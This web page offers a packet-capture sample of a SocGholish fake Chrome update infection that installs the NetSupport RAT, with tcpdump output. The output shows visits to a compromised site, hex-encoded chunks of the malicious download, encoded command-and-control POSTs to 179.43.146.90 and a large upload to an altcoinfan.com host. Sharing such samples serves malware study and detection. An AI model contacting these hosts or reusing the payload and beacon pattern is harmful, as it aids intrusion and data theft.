Text Example

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

Download Attachments

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)
E..A.O……
..e
…._.5.-……………mysocalledchaos.com…..

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
E….d@…..
..e.>o@…P.9…C.&P…….GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
E…….1.[S….
..e.P.>..Y,n.?xP…0…783dd8ca1563a9aa539aeb4137359091b485d367b384986c694f6d23061f3cb4dcbc61373d9f6e6b7a2d195873694c3dd98a63e44b3cb5dcd935a1d2d3f2d485d2e6a784996c3226759f9aa0c34b2c9c61373011859485c2724193dffb5b8d1c87251f3cb4d4b39ec8c260b19485d5a7b384997c993f9d26f23969e04a5b21673590919b7a2d1957a499653ccd8a60253a0a223acaa76735b0919e84c6e6a7c41d3bba9fdc8623097c94fcbc61373ed18594859282e173cf4afb899a4065537da0dcbc217303664694b5f2e6a784942d29d98a20e1686b93faea8700a5d0b19485d2e82690996c6d6cbce6927879839b9af7d14a60b19b44c6e6a6c40c682b3ebcf453d92b97ddb86137159091948493c2a785d9f938af1c263169baa3f87d653735b0919485d0278384995cb9fe1d263179ca421cbc61373d9f6e6b722067838499385bcf4d56351a7b938aec0400a2a7d7c255f2e6a245bd6c3de90f16927978922a4aa1173590999b7a2d115205bd6c3d8dec76a2696cf19b9b376750a706a3c38436878491ad19d98a50e199ca52a89a97c1f5d091948ddd19587361ed19d98a340349fb828cf9261063c0f4a312e5a0f154b96c3618ae60647f5b839b9af7d145b091948913c2a78429c94b4fcc3552181a223acc4137359e90b085d24603927e5aa8eecd46f3b94cb4dc9c6e7611909154f0b4f181128f8b7df98a60246b3cb41c1897f160f686b213c401e7a4996c3c58be60646f59f0ea7a76000d11659485f2e6a78658583dd99a14e07b6981887921773590999b7a2d1157a49d2d09d98a80301b49e048fd61373590919485d2e6e78499627cd

2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
E..(..@…[.
..e…..>.Pn.?x..].P………….
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
E…….1.ZQ….
..e.P.>..].n.?xP…….1000
d8a60655f3cb4fc982227159c509085d2a6a784994c199aaa40699e38b4dcdc613735b0b5d7b5f2e6a784996cbdd98a60457b7ff4fcbc41376590229861d2e665e26e69c98e9d367399abf34cbc6136319091b5a1d3d2a784ddaa6bbeca40647b3d80dcbc3411a3e616d4a5d2c6a73510a89dd96806925ac8223aeb7661235606d315d2e6a680996c1cfd8b54655f78728adb211734b490a085d2b38112efeb7df98a4065ceb5707cbc3561e297d60485d6e79384996c1dd91be9a1ff3cd0eb9a372073c0919084e6e6a7a4b96c3dd98a2423487aa4fcbc613631909100a34492f162dffa2b39aa60455fad3d181c615302b6c783c382e6a385ad6c3de8e121615f3cf09aab272715909fd581d2e61391ae2a2afecef683196b34fcbc613631909100a34492f162dffa2b39aa60455f3cb4d5bd253734d064901335a0f0a2ff7a0b8ddc872278a63598bc6117359a50d085d20652c00f8b7b8eac06736968e23bfb46a6f590919485d2e6a784d96c3ddd8b54655f3cb4dcbc4103a104d1b485d3f2a785996c3dd9aa0500192a921aec413ef4949195c5d2e6a7a4edf8cbbfed56321f1cb3dda86136b5909194a5767070825d1a6a9ecc37457f3c94dcbc60f6619090d470d67040c2ce4a5bcfbc3523491a728ffd353735b091970486e6a7646c28ab3ecc3743392a8289fa7711f3ccd5c4c5d2e6a784996c1dd98a69a45b3cb4dcbc61371534c773c2f5729173cf8b7df98a60655f3cf4dcbc611741c676d3a344b197a4994c3dd98a68e40b3cb43cc925e162d61762c552e6a784996c3dd98a40655f3cb5c8bc6137359091b4c1e410e1d4b96c3ccd8a60255f3cb4fcf827207380b194a5d286a73510a89dd94806925ac8e3cbea77f1a2d7019485d3e2a784b8447c8d8a6021996ad39c9c601f74c49194d0f470d103d94c3df98ad1ec9b9cb43eda9632c10677c39284f06113defc3dd98b64655f1d9c9de861377156c7f3c5f2e78fc5cd6c3d8cacf613d87c94dc9c6186bc54319
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
E…….1.ZP….
..e.P.>..c.n.?xP…;…477b411a270ee4a6bcecc374019baa23cbc6136319091b5ad93b2a784ddaa6bbeca4064777de0dcbc3411a3e616d4a5d2c6a73510a89dd8e806925ac8c3faea767162b5d71293361183d38e3a2b198a60645b3cb4fd9420633590d552d3b5a68785b12d69d98a3543c94a339c9c61173521185025d224c1739c98fb8ebd5523d92a54dcbc60333590b0bcc486e6a7c05f3a5a99aa614d1e68b4dce947a14317d1b485f2e6160d5dcc3cebec9760abfae3eb8927b1237466b0d2c5b0b144996c3cdd8a6044777de0dcbc25f163f7d1b484faa7f38499391b4ffce7257f3c94da3d15373590919485d2e6a784996c3dd14b94655f3cb4dcbae0433590919485d507238499ec3dd98a60655f303108bc6c32e190935281d2e4e18099687bdd8a64e35b3cb01ab86133339491920016e6afc15d6c365c4e60655f3e94d4dde53731d09edb7f1362a780b96372248be4655b1cbb9343f0b33594a19bca219733849d4c32967c01f15f3894d3f399c6a19095a48a9d1a961099680dd6c59fa4cb3cb0ecb32ec544349190b5dda952853d6c39e9852f929e98b4d88c6e78ce11359481e2e9e87ba8c83dddba6f2aaddd00dcb851387a67d02085d6d6a8cb627d89d98e406a10c20568bc65173adf63c541d2e2878bd69a8c1d8a645550734e4d786133059fde692416e6a3b49623cd085e60616f33fb28adb53731309ecb729332a780396352207bb4655b9cbba34140e33594319b0a203743849dcc32467f81815f3814d31399c6d19095348a6d1a266099689dd6459014ab3cb06cb3bec41464919025dd0952656d6c3909859f955f3cc1984a479163a7d3f48c5722a784fd5b1b8f9d26356f3cb4dcbc61b73580191571d2e6a784dc5a6b1fea40657f3ef4d039a53735d4f6b2d382d6a784996c3d598a70eddec8b4dcbc617203c657f4a5d2c6a51498e5f9798af423c80bb22b8a35c155a0919485d2e6278489e4bc2d8a60655f79828a7a011735b09274889722a7845dfadb4ecef682687aa23a8
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
E…….1.[c….
..e.P.>..iGn.?xP…X…a31073d1165948552e68784996c3dd98a6020696a72bc9c61373484919495d2623163ae2a2b3fbc30455f1cb62cb924e3359065a24384f040d39dfadaeecc7683696c84dcbc6137351091840d5312a784996c78efdca6057f3c94de2c60bef1309100b314f190b1defb3b89ba61246b3cb45cbc71bfb464919485d2a391d25f0c1dd9aa632553b900dcbcf501f387a6a063c430f7b492ed19d98ae0657f3cb4dcbc613735d5a7c243b2c6a38f18483dd99a60754f1cb4fcbff1393024919431e420b0b3ad8a2b0fdef7556f3cb5d8bc61b735b0919485d2e6a784dc5a6b1fea406574bd90dcbc713771768742d5f2e687862969f81d8a60d169faa3eb89672013c676d4b5d3a7938499ec3dc98a60655f3cb4dcf95761f3f0b194a5d076a6429d6c3d4dbca6726808223ada9107359185948552e6b784996c3dd98a6020696a72bc9c61173750901d4172e663127e5b7bcf6c563069ab128c8c68f63190911485c2e6a784996c3dd9cf5633995c94dc9c62f7351695948516704102ce4aaa9ebe0743a9ec84dcbd6537351091b485d2e6a784996c78efdca6057f3cb59d8861372590f580b314f190b4b96c1dda3a6f635b3cb4086a3671b366d582c395c0f0b3a95c3dd89e6065df3c94dcbc6137359091d1b38420c7a498427ccd8a60755f7852ca6a311735b092248294f2a7844dba6a9f0c9621497af3faeb56070590908085d266a7a4996c3dd98a60651a0ae21adc41371e11b59485c2e6e3628fba6df98a40613f3572c8bc6193e3c7d712739600b152c95c3658ae6065df3c84dcbc6137359091d1b38420c7a4996c3ccd8

2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP
E…….1.ZN….
..e.P.>..m.n.?xP…’F..1000
a60755f48a29afb476002a0b1908e53c2a784b96c2dc9aa60455cecb55578c1361087c78243448031d2dd5afbcebd548349eae4ecb7e01335901194a5d2e6a784996c3d9cbc36a33f1cb0d73d45373580918495f2e687873962bbcd8a60a139aae21af8777172b6c6a3b5e2e6a690996cbdd9aae8e4ab3cb4dcbc24016356f1b484fca7b384997c3d9d6c76b30f1cb4fcbfc132f3b4919441b470f142dd7a7b9eac37526f0cb4dda86137b590b11c0426e6a78499290b8f4c00455f1735f8bc612735d477825382c6a7a49d0c309c5e60659b4ae3982a867162b6f782b382d6a7859d6c3d598a50eddec8b4dcbc617203c657f4a5d3c2a6b0996c2dd9bef4f11f1cb6dcbc613735b091a073f4468784b96fddd18f84655e28c28bf8f7d073c7b7f293e4b2f163de4bade982a1215f3c34dc9c6137359091948597d0f142f94c3cfd8b54655f2cb4e828f5771590b19795d36f632498784b8ecef682196b92baaa57627386b752d5e2e726d0996cbdd99a60655f3cb4dcbc24016356f1b485f2e59788dc883dd90f3683c87852ca6a31073e11b5948552e68784996c3dd98a6020696a72bc9c653cb4b4919495d2f6b7a4994c3e998be9a1ff3c218a5af67203a66692d5e2ed26a0996cbdd9aa60655f3cb4dcbc24016356f1b481d9678384997c3dc99a40657f3f84d039b53735f4c683d3c42197b4996d39d98ae0657fb43528bc613735d5a7c243b2c6a70c18983dd99a6051a91a14fcbc4135859d944085d252d1d3ddea2aef0e5693196c84d57d6537351091840d5312a784996c78efdca6057f3c94df8c63f131909111c327d1e0a20f8a4de981e1415f3c34dc9ce9b6c19091948597d0f142f94c39d20b44655f2cb4ccac413715952196c3d6e6a691af7a5b8dbc76a39b6b32eaeb6671a36671a48753d2a784196c0d510b94655f3cb4998a37f155b0911c0426e6a79499a86a5fbc37621bca927aea56771590919591d…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
E..(..@…M.
..e…..>.Pn.Bf.A.EP..* y……..
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
E..(V|..5.H.]_d.
..e.P.4vO….:.P….n..
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
E..(..@….W
..e]_d..4.P..:.vO..P….G……..
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
E..(…5.B.]_d.
..e.P.58._.DT.P....z.. 2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0 E..(..@....V ..e]_d..5.P.DT.8.`P….S……..
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
E..(….5..S]_d.
..e.P.6..0…..P…V…
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
E..(..@….U
..e]_d..6.P……0.P…Wb……..
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
E..(.B..5…]_d.
..e.P.7q5jo.n..P….L..
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
E..(z…5.$.]_d.
..e.P.9…FV[..P…….
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.8(…I…P…u”..
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
E..(….5…]_d.
..e.P.:S.c…4.P…]…
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
E..(..@….T
..e]_d..7.P.n..q5jpP….%……..
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
E..(..@….S
..e]_d..9.PV[…..GP… ………
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
E..(..@….R
..e]_d..8.PI…(…P…u………
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
E..(..@….Q
..e]_d..:.P..4.S.c.P…]………
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
E..Oa-..T.d…]#
..e…0.m… D.P..5z…….”…
;.s+2..,…..+,……j….0..Y
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a…T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
E..(..@…=2
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
E..(..@…=1
..e..]#.0… D..m..P…t………
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
E..(a/..T.e…]#
..e…0.m… D.P..5r…
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
E..(.k..T…..]#
…skipping…
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
E…..@….
..e>..#.@.P.@..~b#.P…….GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
E(.ZrF..n.o=.+.Z
..e…?…….!P…l…HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
E..;9…q.”S>..#
..e.P.@~b#..@..P….?..HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
E..(..@….~
..e>..#.@.P.@..~b$.P…[d……..
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
E..8..@…r.
..e.+.Z.?…..!…(P…….POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
E(.(rG..n.pn.+.Z
..e…?…(…1P…Td..
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:…y………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
E..N……..
..e
……..:.
.{………. FHFAEBEECACACACACACACACACACACAAA.. ..
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
E..J..@…r.
..e.+.Z.?…..1…(P….b..POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90
…skipping…
Access-Control-Allow-Methods: GET,POST,OPTIONS,DELETE,PUT

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
E..(.B@…Ln
..e…..>.Pn.G..A.dP..(……….
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1×1.gif?ss&ss2img HTTP/1.1
E….C@…J.
..e…..>.Pn.G..A.dP..(….POST /1×1.gif?ss&ss2img HTTP/1.1
Accept: /
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
E….s@…..
..e.. ..7…..K@:..k..$b……#…[.!….l.X...#.Fdg3..GZ.3q'\].#K..d.u..h.,.4.V..GP.....2z2..T.b[>.8.=^."$.n>m....V.c......f..H..Z...0b....9.>.........(......rV=L~.....m-...0M|.D+.....M.@...-..OA.#..3V7....<.K...,s_..iwk...kyK..S..r=....6......Y..L......|.L.I.........q6...."{v.....)%.g,.@.....]*$.....V.../.ZUD..U.+...6.&+![..aM....d.b.4D.......(."K...?....G..z.).k.c"...!cX.$6I.... ..%…>Z$.r…..S.d.ck.[…..:D..5….jY=.rj.. p ..1…Q..H_……!…zt..……Q.. O..a.…. 2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010 E….t@…#. ..e…........@.<4........ZL...;..!..@.S..!...s....2(.Bk2.m..f}.....8A..8……~.WG..S….……….}.#.v7..z5′.]..xn.x……._?..1.)..t.k8S..Y..O0Q. W.k….h.P.c…o…?4. ….Ih….A..J.jc…..x..l.D[.]a...8.M..7/&d.V./.Y...9._l....R]F..6....H..\k&..+......:.3ul.n.B.#=.....[Mw."P...Z.E..p2X.1[Be.n..=-4(V..%..VsdL...1..?..2^3.....R.........A....h.@m....&1])_x.....Lx.[e...s[.....;.2B+.qL..V..W...@TM..P..h-..R.|........1..%...d.qOm..i.}..?'..w.n"{.j.}P........;)X4...t.B..3........:..dUhQ.....;.....^.#w.e.,.@b8.DZh.1.D....@...W$~....?.....,.H.l.......n..$.+..H.$..NC5?..N...i.V..rx......8..g.$.;.=g2.....(..+.\.G.dXb.dQ.QU.....o......0.i(<.n#3...ube..q*l.wx...N!:51...{..z[......{2 8R4G.c'5.....Y;.:.0.e.-.]..Je....95..L.F#).)..@g.3&a.sg-.........S0..<|n..=....."$"D..>bE.?S.>..Y....)q. .e.F.Y2^...4......Y^..71t......4.p..v....s .h...xK>./.......d...j.>.zv[..n...M4J,..zJA.L....E.....B*. 2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.x@....M ..e.. ..7...$..@:..k..$b.S.c...$....lhZW_.. 2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28 E..8.y@...'i ..e.....…$. @.<4……#8o.$.1Y..D….W76 2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
E..8.{@…’g
..e….....$t.@.<4..........I..". wI.....: 2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254 E....|@....g ..e.. ..7......@:..k..$b....Jb.....r.u.7..........?2..;h.E...N}...h>W.r....r_]...'....|..YTb..7i..:i..3..Y.U......'!.jd.6.~..5...i.],+O....n9.I.G......B..<..ND./...<...1.+....R..Y...F.B.l .Xge....@x.L.a.,K.1a...,.m....L. ^7.Y...6UR.E....R..e...>X5w.....D..=f....Ku...y* 2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8.}@....H ..e.. ..7...$.r@:..k..$b ...I..L@...;.fV..z 2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337 E..m.~@..... ..e.. ..7...YGh@:..k..$b foU?.....]...C.T.+...K.....s"......,....=(K.[.w...+.E....~|.T....'.cgK,.!....V.:._q.g.~..R.i.....H..a...u."#xJ/_.@.M.b...[.."s..Q.*])...C.<........P.!2...nA..5h....M&.j..!.H..Z.K..F.w..b.....)...Y.......e6t=.\......……..”…….f….>……:…=X._.. k..P…,5…e.A%t?o.?….C.=P7P.p.&.@.M ……..6’…….(.R5..s.e0..h.
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
E..8..@….E
..e.. ..7…$R.@:..k..$b.8 ..@…0..@.um…
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
E…..@….f
..e.. ..7….1X@:..k..$b.,|..|..;….id{.,.4.3……..=L_g…Q..Q.V.z{…1}..2.L.4…….!…0^+.P…+……G[g..m..5<.(7..[….v.w…j.<&z..rl.s[x…T..aJ&3jm:^….=.n..a.?.U.m&..I..SI.V…}.h.[…h..0…|.p…K#}V~c..k,..o.s.…N…@.w….W…..4~U.! ..CF.. 2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28 E..8..@….@ ..e.. ..7…$..@:..k..$b..|…+:.ZQ…..o. 2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$_D@M…..K?…6L…..K……0b
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$.@@M…..K?.?q8#.8a.Uu?…{H O
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
E..8..@…..
..e.. ……$?A@M…..K?..?w....}...N=..5. 2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$.^@M.....K?.|.2.\9..g.9..]...7 2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$..@M.....K?...J...T.J.pU.].... 2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$ab@M.....K?.j.U..aAm..*.5%._Z. 2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8..@..... ..e.. ......$p.@M.....K?..X+O.Ts.L..9:..M.. 2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8. @..... ..e.. ......$..@M.....K?.}..j...!.@.z.Du..9 2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.!@..... ..e.. ......$..@M.....K?.......B#...._MC}.h 2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.H@..... ..e.. ......$4O@M.....K?....P0.&..%.M..9*Y. 2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.I@..... ..e.. ......$..@M.....K?...,.OJ.......9uP4. 2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.J@..... ..e.. ......$I.@M.....K?..*.v.#^.R...[~.RR. 2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.K@..... ..e.. ......$a.@M.....K?....J.G.... ..c...k 2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.L@..... ..e.. ......$;@@M.....K?..."h.A...1....&... 2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41 E..E.T@..... ..e.. ......1..@M.....K?.).R.8:.'.k....k.-..6....g=.G_.. 2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28 E..8.W@..... ..e.. ......$|.@M.....K?....F. .h."........ 2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296 E..D..@..... ..e.. ..7...0Q.@:..k..$b..>^n;".. s..Hf:T>.....W....."... ..a.#8.a..X'B..-....a.=.6..m".7.2..^ /..aA.!N... 4F..M...SJ<.F….+h…IRy5..J.B….!!ME….]Z.
..x..C.a..”Q.1..V….Bb:.;)w.(.n..[…r*}~..gM.^.…..7T.fm…s..”….$….6..L..i.d….~.u7D~.>.m0d.M..$.iX..y…….},.Z).a.w;j.. &.M.tb..9k.?.Kn+..IE1\’
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
E..b..@…..
..e.. ……N…Q046P….2..x…. ……………CHLO….PAD…..SNI…..VER…..CCS…..UAID(…TCID,…PDMD0…SMHL4…ICSL8…NONPX…MIDS…SCLS...CSCT…COPTd…IRTTh…CFCWl…SFCWp…———————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————www.google-analytics.comQ046…....~.......Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64....X509........l..Y]..@T.]...W.....E.+...Zk^.o"d.......NSTP.w........…………………………………………………………………………………………………………………………………………………………………………………………………….

Leave a Reply